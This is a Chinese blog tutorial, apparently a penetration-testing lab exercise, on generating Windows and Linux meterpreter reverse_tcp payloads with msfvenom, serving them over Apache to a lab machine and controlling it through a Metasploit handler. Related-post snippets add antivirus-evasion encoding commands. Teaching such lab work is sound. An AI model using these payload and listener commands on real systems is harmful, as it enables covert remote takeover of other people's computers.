使用msfvenom远程控制

已于 2023-07-01 16:54:13 修改
阅读量963 收藏 18
点赞数 1
文章标签: 网络
于 2023-06-29 22:54:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68638628/article/details/131435986
版权

目录

msfvenom是什么?

msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。主要用于生成后门和软件捆绑后门,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

使用msfvenom生成被控端

1.对windows系统的远程控制

1.1生成被控端并在靶机运行

①生成被控端

方法一:
⑴将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5000 -f exe -o /var/pavload.exe

在这里插入图片描述

⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)

cp /var/payload.exe /var/www/html/winpayload.exe

ls 查看指定目录下的所有文件
在这里插入图片描述

方法二:
将被控端winpayload.exe生成到网站的目录(/var/www/html/)下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.130 lport=5000 -f exe -o /var/www/html/winpayload.exe

在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③到靶机WinXPenSP3中下载并运行

在这里插入图片描述

1.2启动主控端

①启动metasploit

在这里插入图片描述

②使用模块,配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
在这里插入图片描述

⑷设置lpost
set lport 5000
在这里插入图片描述

⑸发起攻击,建立会话
在这里插入图片描述

1.3控制靶机

通过shell,执行命令
在这里插入图片描述

⑴查看操作系统信息
在这里插入图片描述

⑵查看目标靶机有哪些磁盘
在这里插入图片描述

⑶延时关闭系统并弹出提示框
在这里插入图片描述
在这里插入图片描述

⑷退出控制
在这里插入图片描述

2.对linux系统的远程控制

2.1生成被控端并在靶机中下载

①生成被控端

将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下

msfvenom -p linux/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5001 -f elf -o /var/www/html/linuxpayload.exe

在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③到靶机WinXPenSP3中下载

⑴下载被控端
在这里插入图片描述

⑵添加执行权限
在这里插入图片描述

2.2启动主控端

①启动metasploit

在这里插入图片描述

②使用模块,配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
在这里插入图片描述

⑷设置lpost
set lport 5001
在这里插入图片描述

⑸发起攻击,运行被控端
在这里插入图片描述
在这里插入图片描述

2.3控制靶机

通过shell,执行命令
⑴查看操作系统信息
在这里插入图片描述

⑵查看主机名
在这里插入图片描述

⑶使用curl命令访问kali的网页
在这里插入图片描述

⑷退出控制
在这里插入图片描述

拓展

1、查看帮助信息
在这里插入图片描述

2、查看所有可以使用的攻击模块
在这里插入图片描述

3、筛选出的模块
这里以reverse_tcp模块为例
在这里插入图片描述

4、查看攻击载荷需要设置的参数
在这里插入图片描述

墨染秋瑟
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
msf之msfvenom使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3699
msfvenom使用
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3082
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom简介及实验
weixin_56249088的博客
04-09 580
美少妇(msf)主要用来生成带后门的软件。
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1875
主要介绍msfvenom 和一些实验
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1539
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 2608
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 1262
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实现远程控制目标系统。此过程分为多个步骤: 首先,确保实验环境的准备,包括启动Kali Linux和Windows 7的...
使用Python进行防病毒免杀解析
12-23
Meterpreter是一种强大的远程控制工具,允许渗透测试者在目标系统上执行各种操作。在命令行中输入`msfvenom`命令,指定payload类型、回连主机和端口,以及输出格式,生成的payload将保存为`evil.py`。 然后,使用py...
trolo:trolo-一个易于使用的脚本,用于生成绕过防病毒软件的有效负载
01-31
反向shell允许攻击者从目标机器上获取一个命令行界面,使得他们可以从远程位置控制受害者的设备。这种类型的攻击常见于 APT(高级持续性威胁)和网络间谍活动中。 "bypass-av" 和 "bypassantivirus" 指的是 trolo ...
AutoXploit:基于metasploit的快速利用
02-05
这些有效载荷可以是简单的命令执行、远程shell或者其他形式的控制系统访问。 "msfvenom"是Metasploit框架中的一个重要工具,用于创建多种类型的有效载荷。用户可以使用msfvenom生成不同平台和类型的payload,例如...
IIS6.0最完整的利用,从远程利用,到本地提权,再到常见失败原因(CVE-2017-7269)1
08-04
使用msfvenom生成payload。 5. **上传与执行**: 在meterpreter会话中,将提权工具和payload上传至目标系统的`c:\tmp`目录,然后执行提权工具。 6. **提权问题解决**: 发现执行提权工具可能导致meterpreter...
msfvenom 基本使用
blackguest07的博客
03-05 1463
msfvenom 基础命令
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 375
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
Msfvenom使用指南
m0_57221101的博客
02-08 6076
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
2020-12-03
weixin_45870307的博客
12-03 525
msf生成的payload的简单免杀 通常利用msf生成的payload在不做任何处理的情况下会被杀软直接干掉,所有需要进行一些操作来进行免杀。 这里我使用的是大蜘蛛杀毒软件来做的实验 msf内置编码器 输入msfvenom -l encoders 会出现msf提供的几种编码方式,使用这些编码对payload进行编码 msfvenom - p windows/shell/reverse_tcp -lhsot 本机ip -lport 端口 -e 编码方式 -i 编码次数 -f 文件格式 -o 文件路径与名称
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
weixin_51803729的博客
02-11 7372
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
msfvenom 实现多态技术的使用方法
05-31
msfvenom 是 Metasploit 框架中的一个非常强大的工具,可以用来生成各种类型的恶意代码,包括多态代码。下面是使用 msfvenom 实现多态技术的基本步骤: 1. 生成 payload:首先需要使用 msfvenom 生成一个 payload,例如 Windows 反向 Meterpreter shell: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f raw > payload.bin ``` 2. 生成多态 payload:接下来,使用 msfvenom 的 -x 选项来指定多态模块,例如使用 shikata_ga_nai 模块: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -e x86/shikata_ga_nai -i 10 -x /usr/share/windows-binaries/plink.exe -f exe > polymorphic_payload.exe ``` 在这个例子中,我们使用 x86/shikata_ga_nai 编码器和 -i 10 选项来生成 10 个不同的变形版本,然后使用 -x 选项指定 plink.exe 作为多态模块。 3. 检测多态性:最后,使用反病毒软件等工具来检测生成的多态 payload,以确保其有效性。 需要注意的是,多态技术虽然可以增加恶意代码的隐蔽性,但并不能完全避免被检测和分析,因此还需要结合其他安全措施来保护系统安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨染秋瑟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值